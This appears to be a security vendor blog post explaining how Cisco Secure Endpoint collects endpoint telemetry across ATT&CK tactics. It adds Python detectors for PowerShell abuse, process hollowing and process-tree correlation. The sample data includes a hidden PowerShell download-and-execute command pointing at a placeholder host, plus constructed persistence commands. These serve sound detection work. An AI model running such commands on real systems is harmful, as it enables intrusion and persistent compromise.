Wednesday, April 2, 2025

Endpoint telemetry plays a pivotal role in cybersecurity by giving organisations the visibility they need to detect potential threats early and respond to them quickly and precisely.

Consider a malware-driven attack that slips past an organisation's defences and ends in significant financial loss. The failure to catch it is rarely an accident; it is usually a direct consequence of limited visibility into what is happening on endpoints. With proactive monitoring and timely access to endpoint activity data, such situations can be identified and mitigated before they cause serious harm. The importance of comprehensive endpoint monitoring is hard to overstate.

What’s endpoint telemetry?

Endpoint telemetry in cybersecurity refers to the data gathered by monitoring activity on endpoint devices such as workstations and servers. This data lets organisations detect threats, respond quickly to incidents, and strengthen their overall security posture through improved situational awareness.

Essential function of endpoint telemetry

Early visibility into complex cyberattacks is crucial for disrupting malicious activity at the earliest possible stage of the attack kill chain. If you can't see it, you can't stop it. Intervening at the outset of an attack is generally far more effective than waiting for it to escalate.

In the MITRE ATT&CK framework, widely used by security professionals, most enterprise attacks, including those attributed to groups such as Turla, ToddyCat, and WizardSpider (TrickBot), progress through several stages, known as tactics, which attackers can chain in different sequences to reach their goals.

Example attack chain for an enterprise-level attack.

The MITRE ATT&CK framework catalogues the tactics, techniques, and procedures (TTPs) attackers use to compromise endpoints, describing each in depth. To intercept malicious activity at the onset of an attack, endpoints must be monitored and suspicious behaviour that matches common techniques must be recorded. This captured telemetry is the raw material for building effective countermeasures and for detecting attacks at their inception. Endpoint telemetry also feeds the knowledge base that lets XDR detect, analyse, and respond to threats across multiple environments, enabling more effective threat hunting and mitigation.

Minimizing false positives

Effective threat detection from telemetry depends heavily on keeping the false-positive rate low. Attackers exploit living-off-the-land binaries (LOLBins), legitimate tools and utilities that are already present and trusted on the system, to carry out a range of techniques and sub-techniques. One well-known state-sponsored APT group has used such tools at several stages of an attack, potentially reaching sensitive information through or . Lazarus, another sophisticated threat actor, likewise abuses legitimate system tools and software to blend in with everyday user activity and evade traditional security controls.

Flagging every use of these tools as malicious would produce a flood of false alarms. One way to address this is to correlate the events and telemetry generated during such activity in an XDR (Extended Detection and Response) platform. Cisco XDR combines telemetry from diverse detection sources to produce high-fidelity incident data, improving its ability to identify and stop sophisticated attacks while keeping false positives to a minimum.

How Cisco Secure Endpoint captures telemetry

Cisco Secure Endpoint is an Endpoint Detection and Response (EDR) tool that collects and analyses several types of endpoint telemetry. It uses a range of detection engines to gather and analyse this telemetry, identify suspicious behaviour patterns, and raise events accordingly. We continually tune the product to capture additional telemetry and to detect events of varying criticality across the different stages of the MITRE ATT&CK framework. Data from Cisco Secure Endpoint is fed into the Cisco XDR analytics platform, where it is combined with other intelligence feeds to produce accurate, detailed threat reports in Cisco XDR.

Key detection events are shown in Cisco Secure Endpoint's Events view, and device trajectory telemetry in the Device Trajectory view.

Secure Endpoint gives visibility into the initial stages of an attack, so teams can neutralise complex threats before they escalate.

Exploring detection events

All of the events used in this example can be viewed from the Management -> Events page of the Cisco Secure Endpoint console.

Execution covers the techniques attackers use to run their payload on a compromised device, which in turn enables the rest of the malicious activity.

Example techniques include:

  • PowerShell scripts that use obfuscated commands to run arbitrary code.
  • Executing scripts and commands through Windows Management Instrumentation (WMI).
  • Executing code through native system APIs.

The screenshot below shows an event raised by Secure Endpoint's Behavioral Protection engine: a PowerShell command using "Invoke-Expression" was flagged as suspicious, having been launched by the "sdiagnhost.exe" process.

An event generated by the Behavioral Protection engine of Secure Endpoint in response to a malicious PowerShell command.
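To make the Execution techniques above concrete, here is an added example (my own, not code from the original post or from Cisco Secure Endpoint) of the kind of check a detection engine runs over process-creation telemetry. It decodes a PowerShell -EncodedCommand payload (base64 over UTF-16LE), looks for Invoke-Expression/IEX, download cradles and hidden windows in both the raw and the decoded command line, and treats an unusual parent such as sdiagnhost.exe as an extra indicator. The sample records, the list of unusual parents and the two-indicator threshold are assumptions for illustration.

```python
import base64
import re
from typing import Optional

# Constructed sample process-creation records, shaped like the fields an EDR
# exposes (pid, parent image, command line). They are not real Secure Endpoint
# data. The second record carries a -EncodedCommand payload built here so the
# decoder has a realistic UTF-16LE/base64 blob to work on.
_ENCODED = base64.b64encode(
    "Invoke-Expression (Get-Content C:\\Users\\Public\\stage2.txt)".encode("utf-16le")
).decode("ascii")

SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3988, "parent_image": "C:\\Windows\\System32\\sdiagnhost.exe",
     "command_line": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/a.ps1')\""},
    {"pid": 4131, "ppid": 2200, "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "powershell.exe -NonInteractive -EncodedCommand " + _ENCODED},
    {"pid": 4140, "ppid": 2200, "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]

# Indicator patterns applied to the raw command line plus any decoded payload.
SUSPICIOUS_PATTERNS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
}

# Parents that rarely launch PowerShell legitimately (illustrative list, an assumption).
UNUSUAL_PARENTS = {"sdiagnhost.exe", "winword.exe", "excel.exe", "outlook.exe",
                   "mshta.exe", "wmiprvse.exe"}


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command_line, re.I)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64-encoding it.
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def analyse_event(event: dict) -> dict:
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    indicators = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    if parent in UNUSUAL_PARENTS:
        indicators.append(f"unusual_parent:{parent}")
    return {
        "pid": event["pid"],
        "parent": parent,
        "decoded_command": decoded,
        "indicators": indicators,
        # Two independent indicators keep a lone "-W Hidden" from paging anyone.
        "suspicious": len(indicators) >= 2,
    }


def analyse_events(events) -> list:
    return [analyse_event(e) for e in events]


if __name__ == "__main__":
    for r in analyse_events(SAMPLE_EVENTS):
        print(r["pid"], r["parent"], "SUSPICIOUS" if r["suspicious"] else "ok", r["indicators"])
```

Decoding the encoded command before matching is the important step: the base64 blob itself says nothing, but the plaintext it hides contains the Invoke-Expression that turns the second record from "one odd flag" into a two-indicator hit.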

Persistence refers to the techniques malware uses to maintain its foothold on a compromised system, so that its payload keeps running despite reboots or configuration changes. These techniques let malware stay in contact with a command-and-control server and receive further instructions.

Example techniques include:

  • Creating new services, or modifying existing ones, so that malicious code runs at system start or on a schedule.
  • Manipulating registry settings so that rogue software launches automatically at boot.
  • Scheduling tasks that run at predetermined times or intervals.

The screenshot below shows a scenario where a new service is created so that the malware runs at startup.

Screenshot of an event generated when a new service is created to run malware at startup.

Defense Evasion covers the techniques adversaries use to hide their payloads and avoid identification by security controls. The intent is to make it as hard as possible for security tools and analysts to identify and stop the attack.

Example techniques include:

  • Process hollowing: the attacker starts a legitimate process in a suspended state, then injects malicious code into that process's address space before resuming it.
  • Impairing the target's defences, for example by disabling antivirus software, firewalls, or logging.
  • Falsifying or tampering with artefacts to evade detection and conceal activity.

The screenshot below shows the Process Hollowing technique detected by the Exploit Prevention engine during the Defense Evasion stage of an attack, illustrating the engine's ability to uncover sophisticated techniques.

Screenshot of an event showing the Process Hollowing technique
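Process hollowing is recognisable less by any single call than by the sequence: a process created suspended, its image unmapped or new memory allocated, a payload written, the thread context redirected, and the thread resumed. The following is an added example (not the Exploit Prevention engine's logic, nor code from the original post) that correlates constructed API-call telemetry per (caller, target) pair inside a time window and raises an alert only when the sequence completes. A benign suspended create followed by a plain resume, and a sequence too slow to belong together, are left alone. The API names are real Win32/NT calls; the event format, the window and the stage grouping are this example's assumptions.

```python
from typing import Dict, List, Tuple

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit for CreateProcess*

CREATE_APIS = {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}
# Stages that follow the suspended create, and the calls that satisfy each.
# Grouping the calls this way is an assumption about what a sensor reports.
STAGES = [
    ("unmap_or_alloc", {"NtUnmapViewOfSection", "ZwUnmapViewOfSection",
                        "VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write_payload", {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("redirect_entry", {"SetThreadContext", "NtSetContextThread", "Wow64SetThreadContext"}),
    ("resume", {"ResumeThread", "NtResumeThread"}),
]
WINDOW_SECONDS = 30.0

# Constructed API-call telemetry (not real sensor output). ts is in seconds,
# pid is the calling process, target_pid the process the call acts on.
SAMPLE_API_EVENTS = [
    # dropper.exe (5012) hollows a suspended svchost.exe (5020)
    {"ts": 100.0, "pid": 5012, "image": "dropper.exe", "api": "CreateProcessW",
     "target_pid": 5020, "target_image": "svchost.exe", "flags": CREATE_SUSPENDED},
    {"ts": 100.1, "pid": 5012, "image": "dropper.exe", "api": "NtUnmapViewOfSection", "target_pid": 5020},
    {"ts": 100.2, "pid": 5012, "image": "dropper.exe", "api": "VirtualAllocEx", "target_pid": 5020},
    {"ts": 100.3, "pid": 5012, "image": "dropper.exe", "api": "WriteProcessMemory", "target_pid": 5020},
    {"ts": 100.4, "pid": 5012, "image": "dropper.exe", "api": "SetThreadContext", "target_pid": 5020},
    {"ts": 100.5, "pid": 5012, "image": "dropper.exe", "api": "ResumeThread", "target_pid": 5020},
    # launcher.exe (3300) creates a child suspended only to attach it to a job object: benign
    {"ts": 200.0, "pid": 3300, "image": "launcher.exe", "api": "CreateProcessW",
     "target_pid": 3310, "target_image": "worker.exe", "flags": CREATE_SUSPENDED},
    {"ts": 200.1, "pid": 3300, "image": "launcher.exe", "api": "AssignProcessToJobObject", "target_pid": 3310},
    {"ts": 200.2, "pid": 3300, "image": "launcher.exe", "api": "ResumeThread", "target_pid": 3310},
    # tool.exe (7000): the write arrives far too long after the create to be the same sequence
    {"ts": 300.0, "pid": 7000, "image": "tool.exe", "api": "CreateProcessW",
     "target_pid": 7010, "target_image": "helper.exe", "flags": CREATE_SUSPENDED},
    {"ts": 400.0, "pid": 7000, "image": "tool.exe", "api": "WriteProcessMemory", "target_pid": 7010},
    {"ts": 400.1, "pid": 7000, "image": "tool.exe", "api": "SetThreadContext", "target_pid": 7010},
    {"ts": 400.2, "pid": 7000, "image": "tool.exe", "api": "ResumeThread", "target_pid": 7010},
]


def detect_process_hollowing(events, window: float = WINDOW_SECONDS) -> List[dict]:
    """One alert per (caller, target) pair that completes a hollowing sequence in time."""
    state: Dict[Tuple[int, int], dict] = {}
    alerts: List[dict] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["pid"], ev["target_pid"])
        api = ev["api"]
        if api in CREATE_APIS:
            # Only a suspended create opens a candidate sequence.
            if ev.get("flags", 0) & CREATE_SUSPENDED:
                state[key] = {"start": ev["ts"], "seen": ["create_suspended"],
                              "caller": ev["image"], "target": ev.get("target_image")}
            continue
        st = state.get(key)
        if st is None:
            continue
        if ev["ts"] - st["start"] > window:
            del state[key]  # too slow to be the same sequence; forget it
            continue
        for stage, apis in STAGES:
            if api in apis and stage not in st["seen"]:
                st["seen"].append(stage)
        if "resume" in st["seen"]:
            seen = set(st["seen"])
            # A write into the suspended child plus either an unmap/alloc or a
            # redirected entry point is the hollowing signature; resume alone is not.
            if "write_payload" in seen and seen & {"unmap_or_alloc", "redirect_entry"}:
                alerts.append({"caller_pid": key[0], "caller": st["caller"],
                               "target_pid": key[1], "target": st["target"],
                               "stages": list(st["seen"]),
                               "elapsed": round(ev["ts"] - st["start"], 3)})
            del state[key]  # the sequence is closed either way
    return alerts


if __name__ == "__main__":
    for a in detect_process_hollowing(SAMPLE_API_EVENTS):
        print(f"{a['caller']} ({a['caller_pid']}) hollowed {a['target']} ({a['target_pid']}): "
              f"{' -> '.join(a['stages'])} in {a['elapsed']}s")
```

Keying the state on the (caller, target) pair is what keeps a debugger or installer writing into one child from contaminating the verdict on another; widening the window turns the slow tool.exe sequence into a second alert, which is the trade-off a tuning exercise has to weigh.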

Discovery refers to the techniques adversaries use to gather information about the target environment, so they can decide how to proceed.

Example techniques include:

  • Enumerating running processes to identify security tools, targets, or valuable assets.
  • Gathering details about the operating system, hardware configuration, and installed software.
  • Enumerating network configuration, interfaces, and reachable hosts and devices.

The screenshot below shows a Secure Endpoint event triggered by anomalous use of "tasklist.exe" on the endpoint, linked to execution by "rundll32.exe", which maps to the Process Discovery technique.

Screenshot of an event showing .exe usage in the endpoint behaving in a suspicious manner

Device trajectory telemetry

Cisco Secure Endpoint captures two types of telemetry data, Activity Telemetry and Behavioral Telemetry, both of which are visible in the Device Trajectory view.

By filtering out irrelevant data, this telemetry keeps noise low and provides a clear view of endpoint activity: processes, the parent-child relationships between them, triggered events, files, and network activity, whether malicious or benign.

Below is a screenshot of the Device Trajectory view in the Secure Endpoint console, showing the Activity Telemetry captured for analysis.

Screenshot of the Device Trajectory view in the Secure Endpoint console, with the Activity Telemetry captured.

Behavioral Telemetry is shown in the Device Trajectory view after evaluation by the detection engine. It is recorded when a malicious action is linked to an otherwise innocuous activity, and provides the context needed to tell harmless and malicious behaviour apart.

Below is a screenshot of the Device Trajectory view in the Secure Endpoint console, showing Behavioral Telemetry captured by the detection engine. In this case the rundll32.exe process is linked to potentially malicious network activity.

Screenshot of the Device Trajectory view in the Secure Endpoint console.
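The Persistence and Discovery events described earlier, the living-off-the-land problem raised under "Minimizing false positives", and the process hierarchy the Device Trajectory view shows all come together once events are tied back to the process tree. The following is an added example (my own, not Secure Endpoint's or Cisco XDR's code) that rebuilds each process's ancestry from constructed process, registry and network telemetry, tags each finding with the ATT&CK tactic it maps to, and only promotes a trajectory to an incident when it spans more than one tactic. A lone tasklist.exe run from an administrator's command prompt therefore stays quiet, while the same tool spawned by rundll32.exe under winword.exe, alongside a Run-key write, a new service, a scheduled task and an outbound connection, does not. All process names, keys and addresses are constructed, and the tactic rules are deliberately simple assumptions.

```python
from typing import Dict, List, Set

# Narrow, illustrative mapping rules (assumptions for this example).
ROOT_PARENTS = {"explorer.exe", "services.exe", "userinit.exe"}  # where a session's tree starts
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
DISCOVERY_TOOLS = {"tasklist.exe", "systeminfo.exe", "whoami.exe", "ipconfig.exe", "net.exe", "nltest.exe"}
PERSISTENCE_KEY_FRAGMENTS = ("\\currentversion\\run\\", "\\currentcontrolset\\services\\")
C2_CAPABLE_LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe"}

# Constructed telemetry (not real Secure Endpoint output).
PROCESSES = [
    {"pid": 1000, "ppid": 1,    "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 2100, "ppid": 1000, "image": "winword.exe",  "cmd": "winword.exe invoice.docx"},
    {"pid": 2200, "ppid": 2100, "image": "rundll32.exe", "cmd": "rundll32.exe C:\\Users\\Public\\u.dll,Start"},
    {"pid": 2300, "ppid": 2200, "image": "tasklist.exe", "cmd": "tasklist.exe /v"},
    {"pid": 2320, "ppid": 2200, "image": "schtasks.exe",
     "cmd": "schtasks.exe /create /tn Upd /tr C:\\Users\\Public\\u.exe /sc onlogon"},
    {"pid": 2330, "ppid": 2200, "image": "sc.exe",
     "cmd": "sc.exe create UpdSvc binPath= C:\\Users\\Public\\u.exe start= auto"},
    {"pid": 4000, "ppid": 1000, "image": "cmd.exe",      "cmd": "cmd.exe"},       # admin's shell
    {"pid": 4100, "ppid": 4000, "image": "tasklist.exe", "cmd": "tasklist.exe"},  # routine check
]
EVENTS = [
    {"pid": 2200, "type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"pid": 2200, "type": "network", "dst": "203.0.113.7", "dport": 443},
    {"pid": 4000, "type": "network", "dst": "10.0.0.5", "dport": 445},
]


def process_tactics(proc: dict, parent: dict) -> Set[str]:
    """ATT&CK tactics suggested by a process-creation record and its parent."""
    tactics: Set[str] = set()
    img = proc["image"].lower()
    pimg = parent["image"].lower() if parent else ""
    cmd = proc["cmd"].lower()
    if img in SCRIPT_HOSTS and pimg in OFFICE_APPS:
        tactics.add("Execution")
    if img in DISCOVERY_TOOLS:
        tactics.add("Discovery")
    if (img == "schtasks.exe" and "/create" in cmd) or (img == "sc.exe" and " create " in cmd):
        tactics.add("Persistence")
    return tactics


def event_tactics(event: dict, proc: dict) -> Set[str]:
    """ATT&CK tactics suggested by a registry or network event and its owning process."""
    tactics: Set[str] = set()
    if event["type"] == "registry" and any(f in event["key"].lower() for f in PERSISTENCE_KEY_FRAGMENTS):
        tactics.add("Persistence")
    if event["type"] == "network" and proc["image"].lower() in C2_CAPABLE_LOLBINS:
        tactics.add("Command and Control")
    return tactics


def ancestry(pid: int, by_pid: Dict[int, dict]) -> List[dict]:
    """Process chain from the top-most known ancestor down to pid."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    chain.reverse()
    return chain


def incident_root(chain: List[dict]) -> dict:
    """The first process launched from a shell or service host is the trajectory's origin."""
    for i in range(1, len(chain)):
        if chain[i - 1]["image"].lower() in ROOT_PARENTS:
            return chain[i]
    return chain[0]


def build_trajectories(processes: List[dict], events: List[dict]) -> Dict[int, dict]:
    by_pid = {p["pid"]: p for p in processes}
    traj: Dict[int, dict] = {}

    def record(pid: int, tactics: Set[str], detail: str) -> None:
        chain = ancestry(pid, by_pid)
        root = incident_root(chain)
        t = traj.setdefault(root["pid"], {"root": root["image"], "tactics": set(), "findings": []})
        t["tactics"] |= tactics
        path = " > ".join(p["image"] for p in chain)
        t["findings"].append(f"{path} {detail} [{', '.join(sorted(tactics))}]")

    for p in processes:
        tactics = process_tactics(p, by_pid.get(p["ppid"]))
        if tactics:
            record(p["pid"], tactics, f"({p['cmd']})")
    for e in events:
        proc = by_pid.get(e["pid"])
        if proc is None:
            continue
        tactics = event_tactics(e, proc)
        if tactics:
            detail = e["key"] if e["type"] == "registry" else f"{e['dst']}:{e['dport']}"
            record(e["pid"], tactics, f"-> {e['type']} {detail}")
    return traj


def incidents(traj: Dict[int, dict], min_tactics: int = 2) -> Dict[int, dict]:
    """Only trajectories that span several tactics are worth an analyst's time."""
    return {pid: t for pid, t in traj.items() if len(t["tactics"]) >= min_tactics}


if __name__ == "__main__":
    for pid, t in incidents(build_trajectories(PROCESSES, EVENTS)).items():
        print(f"incident rooted at {t['root']} ({pid}): {sorted(t['tactics'])}")
        for line in t["findings"]:
            print("   ", line)
```

The min_tactics threshold is the false-positive control: each individual rule here is weak on purpose (tasklist.exe is run by administrators all day), and it is the correlation across the trajectory, the same idea an XDR platform applies across sources, that separates the two tasklist.exe executions.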

The telemetry recorded by Secure Endpoint gives security teams situational awareness across the whole observed event, so they can assess a scenario quickly. The enriched data makes the purpose and scope of the activity clear and equips teams to run more rigorous investigations, leading to better decisions. By giving a deep understanding of potential threats, Secure Endpoint simplifies threat detection, shortens response times, and strengthens the overall security posture.

Conclusion

This review of Cisco Secure Endpoint's detection events and telemetry capabilities shows the enhanced situational awareness that makes a swift response to emerging threats possible. Through careful monitoring and in-depth analysis of endpoint behaviour, organisations gain valuable intelligence about potential compromises and can identify and respond to intrusions at their inception. Such visibility is essential for safeguarding critical systems and strengthening defences against ever-advancing cyber threats.
